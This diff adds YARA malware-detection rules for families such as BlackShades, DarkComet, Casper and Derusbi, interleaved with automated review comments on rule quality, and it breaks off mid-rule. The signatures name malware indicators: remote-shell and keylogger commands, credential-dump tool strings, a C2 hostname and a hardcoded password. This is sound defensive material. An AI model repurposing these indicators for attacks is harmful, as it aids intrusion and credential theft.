+rule Anthem_DeepPanda_Trojan_Kakfum {
+	meta:
+		description = "Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
+		author = "Florian Roth"
+		date = "2015/02/08"
+		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
+	strings:
+		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+		$s1 = "%s\\sqlsrv32.dll" fullword ascii
+		$s2 = "%s\\sqlsrv64.dll" fullword ascii
+		$s3 = "%s\\%d.tmp" fullword ascii
+		$s4 = "ServiceMaix" fullword ascii
+		$s15 = "sqlserver" fullword ascii
+	condition:
+		all of them
+}
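Review bot: `Anthem_DeepPanda_sl_txt_packed` is built entirely from strings of the Foundstone ScanLine tool itself ("Command line port scanner", "sl.exe", "Foundstone Inc.", " 2002 Foundstone Inc."), so it will match any copy of that dual-use utility, not only the sample tied to the `hash` meta; the same holds for `Anthem_DeepPanda_lot1` (PwDump strings) and `Anthem_DeepPanda_htran_exe` (htran usage and pdb strings). That is a reasonable choice for hunting, but the meta should say so explicitly so analysts do not treat a hit as a confirmed Deep Panda artifact, e.g. `description = "Anthem Hack Deep Panda - ScanLine sl-txt-packed (matches the Foundstone ScanLine tool; dual-use)"`. Adding a `score` meta as Babar.yar and Casper.yar do would also let consumers weight these tool-detections lower than the Trojan.Kakfum rule.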
diff --git a/malware/Babar.yar b/malware/Babar.yar
new file mode 100644
index 0000000..2cf2087
--- /dev/null
+++ b/malware/Babar.yar
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SNOWGLOBE_Babar_Malware {
+	meta:
+		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+		author = "Florian Roth"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		date = "2015/02/18"
+		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+		score = 80
+	strings:
+		$mz = { 4d 5a }
+		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+		$z2 = "ExecQueryFailled!" fullword ascii
+		$z3 = "NBOT_COMMAND_LINE" fullword
+		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+
+		$s1 = "/s /n %s \"%s\"" fullword ascii
+		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s3 = "/c start /wait " fullword ascii
+		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+		$x2 = "%COMMON_APPDATA%" fullword ascii
+		$x4 = "CONOUT$" fullword ascii
+		$x5 = "cmd.exe" fullword ascii
+		$x6 = "DLLPATH" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 1MB and
+		(
+			( 1 of ($z*) and 1 of ($x*) ) or
+			( 3 of ($s*) and 4 of ($x*) )
+		)
+}
diff --git a/malware/Bangat.yar b/malware/Bangat.yar
new file mode 100644
index 0000000..61735d2
--- /dev/null
+++ b/malware/Bangat.yar
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BangatCode : Bangat Family 
+{
+    meta:
+        description = "Bangat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // dec [ebp + procname], push eax, push edx, call get procaddress
+        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
+    
+    condition:
+        any of them
+}
+
+rule BangatStrings : Bangat Family
+{
+    meta:
+        description = "Bangat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $lib1 = "DreatePipe"
+        $lib2 = "HetSystemDirectoryA"
+        $lib3 = "SeleaseMutex"
+        $lib4 = "DloseWindowStation"
+        $lib5 = "DontrolService"
+        $file = "~hhC2F~.tmp"
+        $mc = "~_MC_3~"
+
+    condition:
+       all of ($lib*) or $file or $mc
+}
+
+rule Bangat : Family
+{
+    meta:
+        description = "Bangat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        BangatCode or BangatStrings
+}
+
+
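Review bot: `BangatCode` fires on a single 9-byte opcode pattern with three wildcard positions (`FE 4D ?? 8D 4? ?? 50 5? FF`) and has no file-type or size constraint, so with `any of them` it will be evaluated against, and can hit in, arbitrary large binaries and archives. Restricting it to PE files keeps the intent and cuts both scan cost and false positives: `uint16(0) == 0x5A4D and any of them`. `BoousetCode` in Boouset.yar has the same shape (one hex pattern, `any of them`, no bound) and would benefit from the same guard.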
diff --git a/malware/BlackEnergy.yar b/malware/BlackEnergy.yar
new file mode 100644
index 0000000..42ba3d9
--- /dev/null
+++ b/malware/BlackEnergy.yar
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackEnergy_BE_2 {
+        meta:
+                description = "Detects BlackEnergy 2 Malware"
+                author = "Florian Roth"
+                reference = "http://goo.gl/DThzLz"
+                date = "2015/02/19"
+                hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+        strings:
+                $mz = { 4d 5a }
+                $s0 = "<description> Windows system utility service  </description>" fullword ascii
+                $s1 = "WindowsSysUtility - Unicode" fullword wide
+                $s2 = "msiexec.exe" fullword wide
+                $s3 = "WinHelpW" fullword ascii
+                $s4 = "ReadProcessMemory" fullword ascii
+        condition:
+                ( $mz at 0 ) and filesize < 250KB and all of ($s*)
+}
diff --git a/malware/BlackShades.yar b/malware/BlackShades.yar
new file mode 100644
index 0000000..3a453a6
--- /dev/null
+++ b/malware/BlackShades.yar
@@ -0,0 +1,118 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackShades_3 : Trojan
+{
+    meta:
+        description = "BlackShades RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $mod1 = /(m)odAPI/
+        $mod2 = /(m)odAudio/
+        $mod3 = /(m)odBtKiller/
+        $mod4 = /(m)odCrypt/
+        $mod5 = /(m)odFuctions/
+        $mod6 = /(m)odHijack/
+        $mod7 = /(m)odICallBack/
+        $mod8 = /(m)odIInet/
+        $mod9 = /(m)odInfect/
+        $mod10 = /(m)odInjPE/
+        $mod11 = /(m)odLaunchWeb/
+        $mod12 = /(m)odOS/
+        $mod13 = /(m)odPWs/
+        $mod14 = /(m)odRegistry/
+        $mod15 = /(m)odScreencap/
+        $mod16 = /(m)odSniff/
+        $mod17 = /(m)odSocketMaster/
+        $mod18 = /(m)odSpread/
+        $mod19 = /(m)odSqueezer/
+        $mod20 = /(m)odSS/
+        $mod21 = /(m)odTorrentSeed/
+
+        $tmr1 = /(t)mrAlarms/
+        $tmr2 = /(t)mrAlive/
+        $tmr3 = /(t)mrAnslut/
+        $tmr4 = /(t)mrAudio/
+        $tmr5 = /(t)mrBlink/
+        $tmr6 = /(t)mrCheck/
+        $tmr7 = /(t)mrCountdown/
+        $tmr8 = /(t)mrCrazy/
+        $tmr9 = /(t)mrDOS/
+        $tmr10 = /(t)mrDoWork/
+        $tmr11 = /(t)mrFocus/
+        $tmr12 = /(t)mrGrabber/
+        $tmr13 = /(t)mrInaktivitet/
+        $tmr14 = /(t)mrInfoTO/
+        $tmr15 = /(t)mrIntervalUpdate/
+        $tmr16 = /(t)mrLiveLogger/
+        $tmr17 = /(t)mrPersistant/
+        $tmr18 = /(t)mrScreenshot/
+        $tmr19 = /(t)mrSpara/
+        $tmr20 = /(t)mrSprid/
+        $tmr21 = /(t)mrTCP/
+        $tmr22 = /(t)mrUDP/
+        $tmr23 = /(t)mrWebHide/
+
+    condition:    
+        10 of ($mod*) or 10 of ($tmr*)
+}
+
+rule BlackShades2 : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
+rule BlackShades_4 : rat
+{
+	meta:
+		description = "BlackShades"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
+		$b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
+		$c = { 62 73 73 5F 73 65 72 76 65 72 }
+		$d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
+		$e = { 6D 6F 64 49 6E 6A 50 45 }
+		$apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
+
+	condition:
+		any of ($a, $b, $c, $d, $e) or $apikey		
+}
+
+
+rule BlackShades : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
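Review bot: `BlackShades2` and `BlackShades` are byte-for-byte the same rule (identical meta, `$signature1..3` and condition), so every match is reported twice and the file carries two names for one detection; one of them should be removed. `BlackShades_4` also repeats the same three patterns as `$c`, `$d`, `$e`, so the remaining Falcoz rule is fully subsumed by it and could be referenced instead, e.g. `condition: any of ($a, $b) or $apikey or BlackShades`. Indentation is mixed within `BlackShades_3` (the `author` line is tab-indented while the rest uses spaces), which is cosmetic but makes the diff noisier than needed.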
diff --git a/malware/Bolonyokte.yar b/malware/Bolonyokte.yar
new file mode 100644
index 0000000..98d5e93
--- /dev/null
+++ b/malware/Bolonyokte.yar
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bolonyokte : rat 
+{
+	meta:
+		description = "UnknownDotNet RAT - Bolonyokte"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$campaign1 = "Bolonyokte" ascii wide
+		$campaign2 = "donadoni" ascii wide
+		
+		$decoy1 = "nyse.com" ascii wide
+		$decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
+		$decoy3 = "bf13-5d45cb40" ascii wide
+		
+		$artifact1 = "Backup.zip"  ascii wide
+		$artifact2 = "updates.txt" ascii wide
+		$artifact3 = "vdirs.dat" ascii wide
+		$artifact4 = "default.dat"
+		$artifact5 = "index.html"
+		$artifact6 = "mime.dat"
+		
+		$func1 = "FtpUrl"
+		$func2 = "ScreenCapture"
+		$func3 = "CaptureMouse"
+		$func4 = "UploadFile"
+
+		$ebanking1 = "Internet Banking" wide
+		$ebanking2 = "(Online Banking)|(Online banking)"
+		$ebanking3 = "(e-banking)|(e-Banking)" nocase
+		$ebanking4 = "login"
+		$ebanking5 = "en ligne" wide
+		$ebanking6 = "bancaires" wide
+		$ebanking7 = "(eBanking)|(Ebanking)" wide
+		$ebanking8 = "Anmeldung" wide
+		$ebanking9 = "internet banking" nocase wide
+		$ebanking10 = "Banking Online" nocase wide
+		$ebanking11 = "Web Banking" wide
+		$ebanking12 = "Power"
+
+	condition:
+		any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
+}
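Review bot: `$ebanking2`, `$ebanking3` and `$ebanking7` are written as text strings, not regexes, so they match the literal characters `(Online Banking)|(Online banking)` including the parentheses and pipe, which will essentially never occur in a sample; the alternation only works in regex form, e.g. `$ebanking2 = /Online [Bb]anking/`, `$ebanking3 = /e-banking/ nocase`, `$ebanking7 = /(eBanking)|(Ebanking)/ wide`. Separately, `$ebanking4 = "login"` and `$ebanking12 = "Power"` are generic enough that `3 of ($ebanking*)` can be satisfied by ordinary web content, and `2 of ($artifact*)` with `"index.html"`/`"default.dat"`/`"mime.dat"` is similarly weak; consider raising those thresholds or excluding the generic strings from the counts.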
diff --git a/malware/Boouset.yar b/malware/Boouset.yar
new file mode 100644
index 0000000..fb71edd
--- /dev/null
+++ b/malware/Boouset.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BoousetCode : Boouset Family 
+{
+    meta:
+        description = "Boouset code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
+        
+    condition:
+        any of them
+}
+
diff --git a/malware/Bublik_downloader.yar b/malware/Bublik_downloader.yar
new file mode 100644
index 0000000..8427b8f
--- /dev/null
+++ b/malware/Bublik_downloader.yar
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bublik : Downloader
+{
+	meta:
+		author="Kevin Falcoz"
+		date="29/09/2013"
+		description="Bublik Trojan Downloader"
+		
+	strings:
+		$signature1={63 6F 6E 73 6F 6C 61 73}
+		$signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69}
+		
+	condition:
+		$signature1 and $signature2
+}
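Review bot: Both signatures in `Bublik` are plain ASCII encoded as hex (`63 6F 6E 73 6F 6C 61 73` is "consolas", the second is "clUn" NUL "info.ini"), which hides what the rule keys on and makes review harder; YARA text strings express the same bytes directly: `$signature1 = "consolas"` and `$signature2 = "clUn\x00info.ini"`. Making `$signature1` readable also shows it is a common font name that appears in many legitimate binaries, so the `and` with `$signature2` is what carries the specificity and should be kept. The same hex-for-ASCII pattern appears in BlackShades.yar (`62 73 73 5F 73 65 72 76 65 72` is "bss_server").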
diff --git a/malware/Casper.yar b/malware/Casper.yar
new file mode 100644
index 0000000..5a0e9f0
--- /dev/null
+++ b/malware/Casper.yar
@@ -0,0 +1,101 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Casper_Backdoor_x86 {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+		score = 80
+	strings:
+		$s1 = "\"svchost.exe\"" fullword wide
+		$s2 = "firefox.exe" fullword ascii
+		$s3 = "\"Host Process for Windows Services\"" fullword wide
+		
+		$x1 = "\\Users\\*" fullword ascii
+		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x4 = "\\Documents and Settings\\*" fullword ascii
+		
+		$y1 = "%s; %S=%S" fullword wide
+		$y2 = "%s; %s=%s" fullword ascii
+		$y3 = "Cookie: %s=%s" fullword ascii
+		$y4 = "http://%S:%d" fullword wide
+		
+		$z1 = "http://google.com/" fullword ascii
+		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+		$z3 = "Operating System\"" fullword wide
+	condition:
+		( all of ($s*) ) or
+		( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
+}
+
+rule Casper_EXE_Dropper {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+		score = 80
+	strings:
+		$s0 = "<Command>" fullword ascii
+		$s1 = "</Command>" fullword ascii
+		$s2 = "\" /d \"" fullword ascii
+		$s4 = "'%s' %s" fullword ascii
+		$s5 = "nKERNEL32.DLL" fullword wide
+		$s6 = "@ReturnValue" fullword wide
+		$s7 = "ID: 0x%x" fullword ascii
+		$s8 = "Name: %S" fullword ascii
+	condition:
+		7 of them
+}
+
+rule Casper_Included_Strings {
+	meta:
+		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 50
+	strings:
+		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+		$a1 = "& SYSTEMINFO) ELSE EXIT"
+		
+		$mz = { 4d 5a }
+		$c1 = "domcommon.exe" wide fullword							// File Name
+		$c2 = "jpic.gov.sy" fullword 								// C2 Server
+		$c3 = "aiomgr.exe" wide fullword							// File Name
+		$c4 = "perfaudio.dat" fullword								// Temp File Name
+		$c5 = "Casper_DLL.dll" fullword								// Name 
+		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } 	// Decryption Key
+		$c7 = "{4216567A-4512-9825-7745F856}" fullword 				// Mutex
+	condition:
+		all of ($a*) or
+		( $mz at 0 ) and ( 1 of ($c*) )
+}
+
+rule Casper_SystemInformation_Output {
+	meta:
+		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 70	
+	strings:
+		$a0 = "***** SYSTEM INFORMATION ******"
+		$a1 = "***** SECURITY INFORMATION ******"
+		$a2 = "Antivirus: "
+		$a3 = "Firewall: "
+		$a4 = "***** EXECUTION CONTEXT ******"
+		$a5 = "Identity: "
+		$a6 = "<CONFIG TIMESTAMP="
+	condition:
+		all of them
+}
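Review bot: The condition of `Casper_Included_Strings`, `all of ($a*) or ( $mz at 0 ) and ( 1 of ($c*) )`, relies on `and` binding tighter than `or`, so the MZ check applies only to the `$c` branch and the `$a` branch matches any file type; if that is intended, parentheses should make it explicit, `all of ($a*) or ( ( $mz at 0 ) and ( 1 of ($c*) ) )`, and if MZ was meant for both branches the logic is currently wrong. In `Casper_Backdoor_x86` the `all of ($s*)` branch requires only "svchost.exe", "firefox.exe" and "Host Process for Windows Services", which presumably co-occur in some legitimate software; tying that branch to `$mz at 0` or one `$x`/`$y` string would reduce that risk.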
diff --git a/malware/Cerberus.yar b/malware/Cerberus.yar
new file mode 100644
index 0000000..5ee19a9
--- /dev/null
+++ b/malware/Cerberus.yar
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Cerberus : rat
+{
+	meta:
+		description = "Cerberus"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$checkin = "Ypmw1Syv023QZD"
+		$clientpong = "wZ2pla"
+		$serverping = "wBmpf3Pb7RJe"
+		$generic = "cerberus" nocase
+
+	condition:
+		any of them
+}
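Review bot: `$generic = "cerberus" nocase` combined with `any of them` means the rule fires on any file that contains the word "cerberus" in any case, which covers unrelated legitimate software and documents; the three token strings are the specific indicators. Require the generic string only as corroboration: `condition: any of ($checkin, $clientpong, $serverping) or ($generic and 1 of ($checkin, $clientpong, $serverping))` — or simply drop `$generic` from the condition.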
diff --git a/malware/Cookies.yar b/malware/Cookies.yar
new file mode 100644
index 0000000..2cebc27
--- /dev/null
+++ b/malware/Cookies.yar
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CookiesStrings : Cookies Family
+{
+    meta:
+        description = "Cookies Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $zip1 = "ntdll.exePK"
+        $zip2 = "AcroRd32.exePK"
+        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
+        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
+        $exe1 = "Leave GetCommand!"
+        $exe2 = "perform exe success!"
+        $exe3 = "perform exe failure!"
+        $exe4 = "Entry SendCommandReq!"
+        $exe5 = "Reqfile not exist!"
+        $exe6 = "LeaveDealUpfile!"
+        $exe7 = "Entry PostData!"
+        $exe8 = "Leave PostFile!"
+        $exe9 = "Entry PostFile!"
+        $exe10 = "\\unknow.zip" wide ascii
+        $exe11 = "the url no respon!"
+        
+    condition:
+      (2 of ($zip*)) or (2 of ($exe*))
+}
+
+rule Cookies : Family
+{
+    meta:
+        description = "Cookies"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        CookiesStrings
+}
+
diff --git a/malware/DarkComet.yar b/malware/DarkComet.yar
new file mode 100644
index 0000000..5a19a74
--- /dev/null
+++ b/malware/DarkComet.yar
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule DarkComet_2
+{
+    meta:
+        description = "DarkComet RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $bot1 = /(#)BOT#OpenUrl/ wide ascii
+        $bot2 = /(#)BOT#Ping/ wide ascii
+        $bot3 = /(#)BOT#RunPrompt/ wide ascii
+        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
+        $bot5 = /(#)BOT#URLDownload/ wide ascii
+        $bot6 = /(#)BOT#URLUpdate/ wide ascii
+        $bot7 = /(#)BOT#VisitUrl/ wide ascii
+        $bot8 = /(#)BOT#CloseServer/ wide ascii
+
+        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
+        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
+        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii
+
+        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
+        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
+        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
+        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii
+
+        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
+        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
+        $shell3 = /(K)ILLREMOTESHELL/ wide ascii
+
+    condition:
+        4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
+}
+
+rule DarkComet : rat
+{
+	meta:
+		description = "DarkComet" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = "#BEGIN DARKCOMET DATA --"
+		$b = "#EOF DARKCOMET DATA --"
+		$c = "DC_MUTEX-"
+		$k1 = "#KCMDDC5#-890"
+		$k2 = "#KCMDDC51#-890"
+
+	condition:
+		any of them
+}
+
+
diff --git a/malware/Derusbi.yar b/malware/Derusbi.yar
new file mode 100644
index 0000000..2b25050
--- /dev/null
+++ b/malware/Derusbi.yar
@@ -0,0 +1,61 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Trojan_Derusbi {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Sept13"
+        File     = "derusbi_variants v 1.3"
+        MD5      = " c0d4c5b669cc5b51862db37e972d31ec "
+
+    strings:
+        $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??}
+        $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E}
+        $b3 = {4E E6 40 BB}
+        $b4 = {B1 19 BF 44}
+        $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D}
+        $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E}
+        $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3}
+        $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F}
+
+    condition:
+        2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
+}
+
+rule APT_Derusbi_DeepPanda
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
+strings:
+	$D = "Dom4!nUserP4ss" wide ascii
+condition:
+	$D
+}
+
+
+rule APT_Derusbi_Gen
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$2 = "273ce6-b29f-90d618c0" wide ascii
+	$A = "Ace123dx" fullword wide ascii
+	$A1 = "Ace123dxl!" fullword wide ascii
+	$A2 = "Ace123dx!@#x" fullword wide ascii
+	$C = "/Catelog/login1.asp" wide ascii
+	$DF = "~DFTMP$$$$$.1" wide ascii
+	$G = "GET /Query.asp?loginid=" wide ascii
+	$L = "LoadConfigFromReg failded" wide ascii
+	$L1 = "LoadConfigFromBuildin success" wide ascii
+	$ph = "/photoe/photo.asp HTTP" wide ascii
+	$PO = "POST /photos/photo.asp" wide ascii
+	$PC = "PCC_IDENT" wide ascii
+condition:
+	any of them
+}
+
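Review bot: The `MD5` meta of `Trojan_Derusbi` is padded with spaces inside the quotes (`" c0d4c5b669cc5b51862db37e972d31ec "`), so any tool that extracts hashes from meta will get a value that does not compare equal to the real digest; it should read `MD5 = "c0d4c5b669cc5b51862db37e972d31ec"`. The capitalised keys (`Author`, `Date`, `File`, `MD5`) and the `"4Sept13"` date also break with the lowercase `author`/`date`/`hash` convention used by every other rule in this series. Separately, `$b3` and `$b4` are 4-byte patterns, and `2 of ($b1, $b2, $b3, $b4)` can be satisfied by those two alone, which is a weak basis for a match on large inputs; requiring `$b1 or $b2` in that group would tighten it.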
diff --git a/malware/Dexter.yar b/malware/Dexter.yar
new file mode 100644
index 0000000..0aa655e
--- /dev/null
+++ b/malware/Dexter.yar
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dexter_Malware {
+	meta:
+		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+		author = "Florian Roth"
+		reference = "http://goo.gl/oBvy8b"
+		date = "2015/02/10"
+		score = 70
+	strings:
+		$s0 = "Java Security Plugin" fullword wide
+		$s1 = "%s\\%s\\%s.exe" fullword wide
+		$s2 = "Sun Java Security Plugin" fullword wide
+		$s3 = "\\Internet Explorer\\iexplore.exe" fullword wide
+	condition:
+		all of them
+}
diff --git a/malware/Dridex.yar b/malware/Dridex.yar
new file mode 100644
index 0000000..b978b70
--- /dev/null
+++ b/malware/Dridex.yar
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Dridex_Trojan_XML {
+	meta:
+		description = "Dridex Malware in XML Document"
+		author = "Florian Roth @4nc4p"
+		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+		date = "2015/03/08"
+		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
